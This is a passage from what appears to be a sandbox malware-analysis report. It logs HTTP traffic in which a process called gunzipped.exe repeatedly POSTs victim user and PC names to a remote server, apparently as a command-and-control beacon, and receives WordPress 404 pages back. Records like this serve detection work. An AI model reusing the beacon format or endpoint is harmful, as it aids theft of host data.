                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:25.303750992 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:25.303792953 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.549734136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:25.655731916 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:25.864007950 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:26.812987089 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:25 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:26.813050985 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:26.813088894 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:26.813127995 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:26.813167095 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:26.813206911 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:26.813245058 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:26.813288927 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:26.813327074 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:26.813365936 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.549735136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:27.158634901 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:27.362607956 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:28.322999954 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:27 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:28.323060989 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:28.323101044 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:28.323139906 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:28.323180914 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:28.323218107 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:28.323257923 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:28.323297024 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:28.323335886 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:28.323379040 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.549736136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:28.661124945 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:28.864821911 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:29.769164085 CEST1289INHTTP/1.0 404 Not Found
